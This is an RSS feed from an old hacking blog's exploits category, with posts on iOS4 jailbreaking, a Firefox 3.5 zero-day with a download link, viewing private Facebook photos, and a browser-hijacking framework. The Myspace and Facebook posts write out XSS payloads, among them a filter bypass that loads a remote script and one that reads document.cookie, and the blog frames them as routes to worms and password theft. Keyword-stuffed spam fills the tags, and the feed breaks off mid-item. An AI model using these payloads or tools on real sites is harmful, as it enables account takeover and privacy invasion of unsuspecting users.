<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Lifedork &#187; exploits</title>
	<atom:link href="http://www.lifedork.net/category/security/exploits/feed" rel="self" type="application/rss+xml" />
	<link>http://www.lifedork.net</link>
	<description>still GeeX? still SuX!</description>
	<lastBuildDate>Sat, 04 Sep 2010 22:23:12 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<image>
  <link>http://www.lifedork.net</link>
  <url>http://www.lifedork.com/favicon.ico</url>
  <title>Lifedork</title>
</image>
		<item>
		<title>iOS4 Jailbreak Instructions</title>
		<link>http://www.lifedork.net/ios4-jailbreak-instructions.html</link>
		<comments>http://www.lifedork.net/ios4-jailbreak-instructions.html#comments</comments>
		<pubDate>Sun, 04 Jul 2010 17:30:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Miscs]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[cache:83nsz2zxfo4j:www.lifedork.net/how-to-use-pwnagetool-4-01-to-jailbreak-ios-4-iphone-3gs-3g-ipod-touch-2g.html 3g 4.01 ipsw hacktivated download]]></category>
		<category><![CDATA[how to crack ios4 www.crenk.com]]></category>
		<category><![CDATA[jailbreak ios4]]></category>
		<category><![CDATA[jailbreak tool spirit]]></category>
		<category><![CDATA[jailbreaking iOS4]]></category>
		<category><![CDATA[newest iOS4 Jailbreak Instructions]]></category>

		<guid isPermaLink="false">http://www.lifedork.net/?p=892</guid>
		<description><![CDATA[



Image via Wikipedia



Many discussion about jailbreaking iOS4 are crossing the net, some sources say that the previous jailbreak tool spirit doesn&#8217;t work anymore. So I guess we have to wait for the newest iOS4 Jailbreak Instructions.
Brief review from emoiz:
The jailbreak tool Spirit which was released by iPhone Dev Team to jailbreak iPad 3G, iPhone OS [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img" style="margin: 1em; display: block;">
<div>
<dl class="wp-caption alignright" style="width: 310px;">
<dt class="wp-caption-dt"><a href="http://en.wikipedia.org/wiki/File:IPhone_SDK_-_New_Project.png"><img title="iPhone SDK included in Xcode 3.1 final." src="http://upload.wikimedia.org/wikipedia/en/thumb/7/7d/IPhone_SDK_-_New_Project.png/300px-IPhone_SDK_-_New_Project.png" alt="iPhone SDK included in Xcode 3.1 final." width="300" height="265" /></a></dt>
<dd class="wp-caption-dd zemanta-img-attribution" style="font-size: 0.8em;">Image via <a href="http://en.wikipedia.org/wiki/File:IPhone_SDK_-_New_Project.png">Wikipedia</a></dd>
</dl>
</div>
</div>
<p>Many discussion about<strong> jailbreaking iOS4</strong> are crossing the net, some sources say that the previous<strong> jailbreak tool spirit</strong> doesn&#8217;t work anymore. So I guess we have to wait for the <strong>newest iOS4 Jailbreak Instructions</strong>.</p>
<p>Brief review from <a href="http://www.emoiz.com/spirit-jailbreak-does-not-work-with-ios-4" target="_blank">emoiz</a>:</p>
<blockquote><p>The jailbreak tool Spirit which was released by iPhone Dev Team to jailbreak iPad 3G, iPhone OS 3.1.2, 3.1.3, or 3.2 is not working any more with the newly launched iOS 4 which was revealed by Apple few days back at WWDC 2010.<br />
As iH8Sn0w has confirmed that the iOS exploit is filled now so obviously Spirit could not work anymore for jailbreak. So, the users have to wait until the new exploit in iPhone OS will identify in near future to build new jailbreak tool.</p>
<p>Until than stay with us for new instructions about iOS 4 jailbreak.</p></blockquote>
<h6 class="zemanta-related-title" style="font-size: 1em;">Related articles by Zemanta</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://crenk.com/official-jailbreak-for-iphone-3gs-ios-4-with-new-bootrom/">Official Jailbreak for iPhone 3GS iOS 4 with new Bootrom</a> (crenk.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.macstories.net/news/iphone-4-gets-its-first-userland-jailbreak/">iPhone 4 Gets Its First &#8220;Userland&#8221; Jailbreak</a> (macstories.net)</li>
<li class="zemanta-article-ul-li"><a href="http://www.brighthub.com/mobile/iphone/articles/75327.aspx">Complete Guide to Jailbreaking your iPhone</a> (brighthub.com)</li>
</ul>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><span class="zem-script more-related pretty-attribution"><script src="http://static.zemanta.com/readside/loader.js" type="text/javascript"></script></span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/ios4-jailbreak-instructions.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox 3.5 zero day exploit released</title>
		<link>http://www.lifedork.net/firefox-35-zero-day-exploit-released.html</link>
		<comments>http://www.lifedork.net/firefox-35-zero-day-exploit-released.html#comments</comments>
		<pubDate>Thu, 16 Jul 2009 09:31:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[9137 exploit milw0rm]]></category>
		<category><![CDATA[Browser]]></category>
		<category><![CDATA[cache:milw0rm]]></category>
		<category><![CDATA[cache:zhc9q6szzqgj:www.lifedork.net/download-backtrack-4-pre-final-and-backtrack-4-guide.html back track 4 user guide]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[howto install millworm exploits bactrack 4]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[learn how to hack with milworm]]></category>
		<category><![CDATA[milw0rm alternative]]></category>
		<category><![CDATA[milw0rm and 0 day exploit]]></category>
		<category><![CDATA[milw0rm cache]]></category>
		<category><![CDATA[mozilla exploits backtrack 4]]></category>
		<category><![CDATA[Mozilla Foundation]]></category>
		<category><![CDATA[Secunia]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Windows Vista]]></category>

		<guid isPermaLink="false">http://www.lifedork.net/?p=820</guid>
		<description><![CDATA[



Image via Wikipedia



Milw0rm is finally back with some new interesting informations and exploits , one of then is Firefox 3.5 Zero Day exploit! the exploit has been published on milw0rm yesterday. The firefox 3.5 zero day exploit itself simply demonstrates a security vulnerability that existed on firefox 3.5 by loading windows calculator. The most preventive [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img" style="margin: 1em; display: block;">
<div>
<dl class="wp-caption alignright" style="width: 310px;">
<dt class="wp-caption-dt"><a href="http://en.wikipedia.org/wiki/Image:Mozilla_Foundation_logo.svg"><img title="Mozilla Foundation logo" src="http://upload.wikimedia.org/wikipedia/en/thumb/7/74/Mozilla_Foundation_logo.svg/300px-Mozilla_Foundation_logo.svg.png" alt="Mozilla Foundation logo" width="300" height="282" /></a></dt>
<dd class="wp-caption-dd zemanta-img-attribution" style="font-size: 0.8em;">Image via <a href="http://en.wikipedia.org/wiki/Image:Mozilla_Foundation_logo.svg">Wikipedia</a></dd>
</dl>
</div>
</div>
<p>Milw0rm is finally back with some new interesting informations and exploits , one of then is <strong>Firefox 3.5 Zero Day exploit</strong>! the exploit has been published on milw0rm yesterday. The firefox 3.5 zero day exploit itself simply demonstrates a security vulnerability that existed on firefox 3.5 by loading windows calculator. The most preventive way to take is by disabling javascript on firefox 3.5 , otherwise your pcs might get infected!</p>
<p>Excerpt :</p>
<blockquote><p>The exploit portal Milw0rm has published an exploit for Firefox 3.5. The exploit demonstrates a security vulnerability by starting the Windows calculator. In testing by heise Security, the exploit crashed Firefox under Vista, but security service providers Secunia and VUPEN confirmed that attackers using prepared websites can infect PCs. The cause of the problem is a buffer overflow when processing specially prepared Font tags.</p>
<p>The Mozilla Foundation has been informed about the problem, but so far has not responded to queries by heise Security. An update does not currently exist. So far there are no reports of sites on the internet being first to use the hole for active infections and exploitation of Windows PCs. Since the published exploit uses PC heap spraying under JavaScript, disabling JavaScript should act as a stop gap. When the exploit was tested with Windows 7 RC1, after a short time, the browser displayed a dialogue offering to abort the script.</p></blockquote>
<p><strong>Download firefox 3.5 zero day Exploit : http://www.milw0rm.com/exploits/9137</strong></p>
<h6 class="zemanta-related-title" style="font-size: 1em;">Related articles :</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://mashable.com/2009/07/15/security-vulnerability-firefox-3-5/"> Highly Critical Security Vulnerability Found in Firefox 3. </a> (mashable.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.macworld.com/article/141694/2009/07/firefox35_javascript.html?lsrc=rss_main"> Firefox 3.5 vulnerable to critical Javascript attack </a> (macworld.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.consumingexperience.com/2009/07/firefox-users-critical-security.html"> Firefox users: critical security vulnerability </a> (consumingexperience.com)</li>
</ul>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><span class="zem-script more-related pretty-attribution"><script src="http://static.zemanta.com/readside/loader.js" type="text/javascript"></script></span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/firefox-35-zero-day-exploit-released.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>how to view facebook private profiles pictures</title>
		<link>http://www.lifedork.net/how-to-view-facebook-private-profiles-pictures-2.html</link>
		<comments>http://www.lifedork.net/how-to-view-facebook-private-profiles-pictures-2.html#comments</comments>
		<pubDate>Wed, 15 Apr 2009 23:44:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Miscs]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Web Hacking]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[facebook "private profile pictures"]]></category>
		<category><![CDATA[facebook private photo script]]></category>
		<category><![CDATA[facebook private photos]]></category>
		<category><![CDATA[facebook viewer script for grease]]></category>
		<category><![CDATA[facebookprivate]]></category>
		<category><![CDATA[failed. next try with 5000 ivs]]></category>
		<category><![CDATA[greasemonkey facebook view private profile scripts]]></category>
		<category><![CDATA[hack facebook]]></category>
		<category><![CDATA[Hacking Facebook]]></category>
		<category><![CDATA[how to view facebook private profile]]></category>
		<category><![CDATA[how to view facebook private profiles]]></category>
		<category><![CDATA[how to view pictures on facebook locked profiles]]></category>
		<category><![CDATA[how to view private facebook photos]]></category>
		<category><![CDATA[how to view private profile pictures in facebook]]></category>
		<category><![CDATA[how to view profile pictures on facebook]]></category>
		<category><![CDATA[how view private photos and private profiles on facebook]]></category>
		<category><![CDATA[see facebook hidden pictures]]></category>
		<category><![CDATA[shocking disgusting toy story]]></category>
		<category><![CDATA[the shocking hidden message in the google logo! you will not believe this!!]]></category>
		<category><![CDATA[use greasemonkey to hack facebook privacy]]></category>
		<category><![CDATA[view facebook messages]]></category>
		<category><![CDATA[view facebook photos]]></category>
		<category><![CDATA[view facebook photos grease script]]></category>
		<category><![CDATA[view facebook private profile]]></category>
		<category><![CDATA[view facebook private profiles]]></category>
		<category><![CDATA[view private facebook profiles greasemonkey]]></category>
		<category><![CDATA[view private photos on facebook]]></category>
		<category><![CDATA[view private profile pictures facebook]]></category>
		<category><![CDATA[viewing private profile pictures on facebook]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=469</guid>
		<description><![CDATA[



Image via Wikipedia



Hacking Facebook Private Photos has become the most wanted stuff nowadays , I don&#8217;t know since when people start searching those keywords on Google , and they finally stumbled to this Blog (and unfortunately found nothing on this blog   ). Btw , I&#8217;m just going to introduce you to facebook view [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img" style="margin: 1em; float: right; display: block;">
<div>
<dl class="wp-caption" style="width: 212px;">
<dt class="wp-caption-dt"><a href="http://commons.wikipedia.org/wiki/Image:Facebook.svg"><img title="Facebook, Inc." src="http://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Facebook.svg/202px-Facebook.svg.png" alt="Facebook, Inc." width="202" height="76" /></a></dt>
<dd class="wp-caption-dd zemanta-img-attribution" style="font-size: 0.8em;">Image via <a href="http://commons.wikipedia.org/wiki/Image:Facebook.svg">Wikipedia</a></dd>
</dl>
</div>
</div>
<p><strong>Hacking Facebook Private Photos</strong> has become the most wanted stuff nowadays , I don&#8217;t know since when people start searching those keywords on Google , and they finally stumbled to this Blog (and unfortunately found nothing on this blog <img src='http://www.lifedork.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ). Btw , I&#8217;m just going to introduce you to <strong>facebook view all photos script</strong> that can be used to <strong>hack facebook private photos</strong> of <strong>private facebook profile</strong>. This is not a <strong>crack facebook profile tutorial . </strong></p>
<p>The <strong>script to view the facebook private photos</strong> itself is based on greasemonkey. And Some features that you will find from this script are :</p>
<blockquote><p>* Lets y</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/how-to-view-facebook-private-profiles-pictures-2.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>New Myspace Xss vulnerability discovered!</title>
		<link>http://www.lifedork.net/new-myspace-xss-vulnerability-discovered.html</link>
		<comments>http://www.lifedork.net/new-myspace-xss-vulnerability-discovered.html#comments</comments>
		<pubDate>Thu, 29 Jan 2009 19:01:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[Arts]]></category>
		<category><![CDATA[bypass myspace private profiles]]></category>
		<category><![CDATA[ceat poin blank terbaru.com]]></category>
		<category><![CDATA[cheat 3 september point blank]]></category>
		<category><![CDATA[cheat point blaank september]]></category>
		<category><![CDATA[cheat point blank 3 september]]></category>
		<category><![CDATA[cheat point blank 5 september]]></category>
		<category><![CDATA[cheat point blank agustus]]></category>
		<category><![CDATA[cheat point blank baru update]]></category>
		<category><![CDATA[cheat point blank paling baru agustus]]></category>
		<category><![CDATA[cheat point blank september]]></category>
		<category><![CDATA[cheat point blank terbaru 4 september]]></category>
		<category><![CDATA[cheat point blank terbaru agustus]]></category>
		<category><![CDATA[cheat point blank terbaru agustus-september]]></category>
		<category><![CDATA[cheat point blank terbaru agustusseptember myspace xss howto]]></category>
		<category><![CDATA[cheat point blank terbaru september]]></category>
		<category><![CDATA[cheat point blank update september]]></category>
		<category><![CDATA[cheat pointblank september]]></category>
		<category><![CDATA[cheat pointblank terbaru]]></category>
		<category><![CDATA[cheat pointblank terbaru agustus]]></category>
		<category><![CDATA[cheat terbaru 3 sebtember]]></category>
		<category><![CDATA[cheat terbaru no passwoard]]></category>
		<category><![CDATA[cheat terbaru point blank september]]></category>
		<category><![CDATA[cheat terbaru point blank update september]]></category>
		<category><![CDATA[cheat terbaru sep-tember]]></category>
		<category><![CDATA[cheatpointblank terbaru.com]]></category>
		<category><![CDATA[def]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[hack cheat point blank]]></category>
		<category><![CDATA[hack facebook ??? ?? ubuntu?]]></category>
		<category><![CDATA[hack facebook ubuntu]]></category>
		<category><![CDATA[hacking facebook photos using javascript]]></category>
		<category><![CDATA[hacking msn with ubuntu]]></category>
		<category><![CDATA[how to use exploit to hack password on facebook]]></category>
		<category><![CDATA[minimize point blank terbaru september]]></category>
		<category><![CDATA[MySpace]]></category>
		<category><![CDATA[myspace xss howto]]></category>
		<category><![CDATA[password cheat point blank terbaru]]></category>
		<category><![CDATA[pasword cheat point blank terbaru]]></category>
		<category><![CDATA[point blank hack]]></category>
		<category><![CDATA[point blank terbaru]]></category>
		<category><![CDATA[Security Scanners]]></category>
		<category><![CDATA[shy update terbaru september]]></category>
		<category><![CDATA[Uniform Resource Locator]]></category>
		<category><![CDATA[update cheat pointlank september]]></category>
		<category><![CDATA[update terbaru cheat pointblank agustus]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[xss hack]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=649</guid>
		<description><![CDATA[A new xss vulnerability has been discovered by Daniel Lo Nigro which is implemented on a Myspace band profile. He has found a trick to bypass Myspace filters which prevent &#60;script&#62; tag. It can be exploited this way :
URL: test.com?&#60;scrihttp://pt src=//site.com/xss.js&#62;
And of course this xss can used for implementing myspace worm , or even for [...]]]></description>
			<content:encoded><![CDATA[<p>A new xss vulnerability has been discovered by Daniel Lo Nigro which is implemented on a Myspace band profile. He has found a trick to bypass Myspace filters which prevent &lt;script&gt; tag. It can be exploited this way :<br />
<code>URL: test.com?&lt;scrihttp://pt src=//site.com/xss.js&gt;</code></p>
<p>And of course this xss can used for implementing <strong>myspace worm</strong> , or even for some advanced <strong>myspace hacking</strong> or <strong>Myspace password hack</strong>.</p>
<p>Mirror : <a href="http://xssed.com/mirror/57181/" target="_blank">http://xssed.com/mirror/57181/</a></p>
<h6 class="zemanta-related-title" style="font-size: 1em;">Random articles :</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://www.lockergnome.com/windows/2008/12/10/windows-vulnerability-scanner-v129/">l0ckergn0me: Windows Vulnerability Scanner v1.29 (via Blog)</a> (lockergnome.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.wired.com/reviews/product/inq_review">Addicted to Facebook? Your Phone Is Calling</a> (wired.com)</li>
<li class="zemanta-article-ul-li"><a href="http://www.sciencetext.com/the-seven-security-pain-points.html">The Seven Security Pain Points</a> (sciencetext.com)</li>
</ul>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><a class="zemanta-pixie-a" title="Zemified by Zemanta" href="http://reblog.zemanta.com/zemified/a1fdd142-5465-4cb3-b357-6448111e6f32/"><br />
</a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/new-myspace-xss-vulnerability-discovered.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>More Facebook Xss Hacking 2009</title>
		<link>http://www.lifedork.net/more-facebook-xss-hacking-2009.html</link>
		<comments>http://www.lifedork.net/more-facebook-xss-hacking-2009.html#comments</comments>
		<pubDate>Mon, 26 Jan 2009 08:51:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[? facebook(www.facebook.com)]]></category>
		<category><![CDATA[cross site scripting and facebook hacking]]></category>
		<category><![CDATA[dacebook]]></category>
		<category><![CDATA[dacebook xss]]></category>
		<category><![CDATA[dork hack]]></category>
		<category><![CDATA[faceboo xss]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[facebook apps xss]]></category>
		<category><![CDATA[facebook cross site scripting]]></category>
		<category><![CDATA[Facebook features]]></category>
		<category><![CDATA[facebook login xss hack]]></category>
		<category><![CDATA[facebook private profiles and pictures viewer hack tool 2.0a.rar]]></category>
		<category><![CDATA[facebook rerouting xss]]></category>
		<category><![CDATA[facebook xss]]></category>
		<category><![CDATA[facebook xss hack]]></category>
		<category><![CDATA[force cross-site script facebook]]></category>
		<category><![CDATA[hack facebook dengan xss]]></category>
		<category><![CDATA[hack facebook password]]></category>
		<category><![CDATA[hack facebook xss]]></category>
		<category><![CDATA[hack tool 2.0a.rar]]></category>
		<category><![CDATA[hack-facebook info/?tag=/hack facebook]]></category>
		<category><![CDATA[hacking facebook using xss]]></category>
		<category><![CDATA[how to hack with xxs]]></category>
		<category><![CDATA[how to view facebook private profile]]></category>
		<category><![CDATA[how to xss on facebook]]></category>
		<category><![CDATA[http://www.facebook.com/reset.php?locale=en_gb">">]]></category>
		<category><![CDATA[http://www.facebook/reset.php]]></category>
		<category><![CDATA[Login]]></category>
		<category><![CDATA[On the Web]]></category>
		<category><![CDATA[Online Communities]]></category>
		<category><![CDATA[p3lo]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[reset.php facebook]]></category>
		<category><![CDATA[Social network]]></category>
		<category><![CDATA[sstic 09 facebook xxs]]></category>
		<category><![CDATA[view facebook private profile]]></category>
		<category><![CDATA[Website]]></category>
		<category><![CDATA[www.facebook.com/reset.php?locale=it-it]]></category>
		<category><![CDATA[www.facebook/reset.php]]></category>
		<category><![CDATA[www.facebook/resetphp.com]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[xss and facebook]]></category>
		<category><![CDATA[xss facebook]]></category>
		<category><![CDATA[xss in facebook]]></category>
		<category><![CDATA[xxs facebook cookie]]></category>
		<category><![CDATA[xxs kugok facebook]]></category>
		<category><![CDATA[[xss]facebook !]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=641</guid>
		<description><![CDATA[



Image via Wikipedia



If I have mentioned some security flaw that Facebook ever faced , like how to view facebook private profile pictures , some another facebook security flaws just have been discovered during the late 2008 until January 2009. And I&#8217;m pretty sure there will be more facebook xss hacking in 2009 . Some major [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img" style="margin: 1em; float: right; display: block;">
<div>
<dl class="wp-caption" style="width: 212px;">
<dt class="wp-caption-dt"><a href="http://en.wikipedia.org/wiki/Image:Facebook.png"><img title="Facebook's new homepage features a login form ..." src="http://upload.wikimedia.org/wikipedia/en/thumb/5/55/Facebook.png/202px-Facebook.png" alt="Facebook's new homepage features a login form ..." width="202" height="105" /></a></dt>
<dd class="wp-caption-dd zemanta-img-attribution" style="font-size: 0.8em;">Image via <a href="http://en.wikipedia.org/wiki/Image:Facebook.png">Wikipedia</a></dd>
</dl>
</div>
</div>
<p>If I have mentioned some security flaw that Facebook ever faced , like <strong><a href="http://www.lifedork.com/how-to-view-facebook-private-profiles-pictures.html" target="_blank">how to view facebook private profile pictures</a></strong> , some another facebook security flaws just have been discovered during the late 2008 until January 2009. And I&#8217;m pretty sure there will be <strong>more facebook xss hacking</strong> in <strong>2009</strong> . Some major <strong>facebook xss vulnerabilities</strong> has been published on <a href="http://www.Xssed.com" target="_blank">Xssed.com</a> (the most well-known website for xss news). And of course , you&#8217;re very allowed to leave this post if you still think Xss is not dangerous at all <img src='http://www.lifedork.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  . Some <strong>critical Facebook Xss flaws</strong> can infect million facebook members with malware. And it&#8217;s not impossible for a <strong>new facebook xss worm</strong> to be developed under these circumstances.</p>
<p>The first Facebook xss vulnerability was occured on <strong>facebook reset password</strong> page :<br />
<strong>XSS:</strong><br />
<code>http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</code><br />
<strong>Mirror :</strong> <a href="http://www.xssed.com/mirror/55951/" target="_blank">http://www.xssed.com/mirror/55951/</a></p>
<p><strong>The 2nd :</strong> (with POST)<br />
<code>https://login.facebook.com/login.php?iphone&amp;next=http%3A%2F%2Fiphone.facebook.com%2F</code></p>
<p>POST:</p>
<p><code>email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&amp;pass=greetz2evilghost&amp;next=http%3A%2F%2Fiphone.facebook.com%2F&amp;login=Login</code></p>
<p><strong>The 3rd :</strong><br />
<code>http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E</code></p>
<p><strong>The 4th :</strong> (with POST)<br />
<code>http://developers.facebook.com/tools.php?fbml</code></p>
<p>POST:<br />
<code><br />
profile=1299125444&amp;position=wide&amp;api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&amp;fbml=</code></p>
<h6 class="zemanta-related-title" style="font-size: 1em;">Random articles :</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://www.allfacebook.com/2008/12/is-facebook-connect-a-phishers-dream/">Is Facebook Connect a Phisher&#8217;s Dream?</a></li>
<li class="zemanta-article-ul-li"><a href="http://blog.taragana.com/index.php/archive/5-reasons-to-start-using-facebook-connect-now/">5 Reasons to Start Using Facebook Connect Now</a></li>
</ul>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><a class="zemanta-pixie-a" title="Zemified by Zemanta" href="http://reblog.zemanta.com/zemified/2923626b-0fa2-40af-88ab-40736c925a41/"><br />
</a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/more-facebook-xss-hacking-2009.html/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Browser Rider &#8211; Exploit your browser!</title>
		<link>http://www.lifedork.net/browser-rider-exploit-your-browser.html</link>
		<comments>http://www.lifedork.net/browser-rider-exploit-your-browser.html#comments</comments>
		<pubDate>Fri, 28 Nov 2008 20:03:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Sectools]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[secInfo]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[browser rider demo]]></category>
		<category><![CDATA[disgusting hidden message in toy story 3]]></category>
		<category><![CDATA[disgusting hidden message toy story]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Languages]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Scripts]]></category>
		<category><![CDATA[the shocking message in google logo]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[WWW]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=447</guid>
		<description><![CDATA[

Just stumbled across to packet storm security&#8217;s tools collection , and I&#8217;ve just found an interesting tool to be discussed here , especially if you&#8217;re interested in Browser exploitation. The tool itself is called Browser Rider. It&#8217;s a hacking framework to build payloads that exploit your browser. Sounds similar to bEEF ? Well , yes [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img zemanta-action-click">
<div class="wp-caption alignright" style="width: 212px"><a href="http://commons.wikipedia.org/wiki/Image:Group_of_Apaches.jpg"><img title="A Group of Apaches {{fi|Apasseja näyttävissä r..." src="http://upload.wikimedia.org/wikipedia/commons/thumb/0/04/Group_of_Apaches.jpg/202px-Group_of_Apaches.jpg" alt="A Group of Apaches {{fi|Apasseja näyttävissä r..." width="202" height="155" /></a><p class="wp-caption-text">Image via Wikipedia</p></div>
</div>
<p>Just stumbled across to packet storm security&#8217;s tools collection , and I&#8217;ve just found an interesting tool to be discussed here , especially if you&#8217;re interested in Browser exploitation. The tool itself is called Browser Rider. It&#8217;s a hacking framework to build payloads that exploit your browser. Sounds similar to bEEF ? Well , yes it does! the developer&#8217;s purpose of developing this tool is to provide you with the more reliable browser hacking framework than just those other unmaintained tools out there <img src='http://www.lifedork.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  nice..</p>
<p>However , here&#8217;s the excerpt from their official project site :</p>
<blockquote><p>Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmainted, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.<br />
What are the features?</p>
<p>^ Easily create powerful payloads and plugins<br />
^ Manage payloads automatically with plugins<br />
^ All data can be saved in a database<br />
^ Obfuscation<br />
^ Polymorphisme<br />
^ Control more than one zombie at a time<br />
^ Simple administration panel<br />
Why create Browser Rider?</p>
<p>› Fun<br />
› The challenge of creating something better than what is already existing<br />
› Browser Rider can be used as a better XSS tunnel than the other tools during a pentest<br />
› General hacking<br />
Technical requirements</p>
<p>› PHP 5, with json installed<br />
› Mysql<br />
› Apache with url_rewrite on<br />
› Targets must have Javascript turned on</p></blockquote>
<p>You can also try the online demo of Browser Rider by following these steps :<br />
- Open <strong>http://ultratopcool.free.fr/xss_remotedomain.html</strong> , and do not close it.<br />
- Then go to <strong>http://www.engineeringforfun.com/BrowserRiderDemo/</strong> , and you should see your ip in the zombie list</p>
<p>Watch the video &amp; Read more about this project <a href="http://engineeringforfun.com/browserrider.html" target="_blank">here</a> !</p>
<h6 class="zemanta-related-title" style="font-size: 1em;">Related article :</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://www.theregister.co.uk/2008/11/27/wordpress_update/">WordPress update kyboshes XSS flaw</a></li>
</ul>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><a class="zemanta-pixie-a" title="Zemified by Zemanta" href="http://reblog.zemanta.com/zemified/c4b1df33-f16f-4891-8132-8bd8bf398ef3/"><img class="zemanta-pixie-img" style="border: medium none; float: right;" src="http://img.zemanta.com/reblog_e.png?x-id=c4b1df33-f16f-4891-8132-8bd8bf398ef3" alt="Reblog this post [with Zemanta]" /></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/browser-rider-exploit-your-browser.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>MS08-067 Exploit Patch Download</title>
		<link>http://www.lifedork.net/ms08-067-exploit-patch-download.html</link>
		<comments>http://www.lifedork.net/ms08-067-exploit-patch-download.html#comments</comments>
		<pubDate>Fri, 28 Nov 2008 19:41:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[secInfo]]></category>
		<category><![CDATA[4x hack ?nd?r]]></category>
		<category><![CDATA[??????? ms08-067]]></category>
		<category><![CDATA[bescor mp-101 hack]]></category>
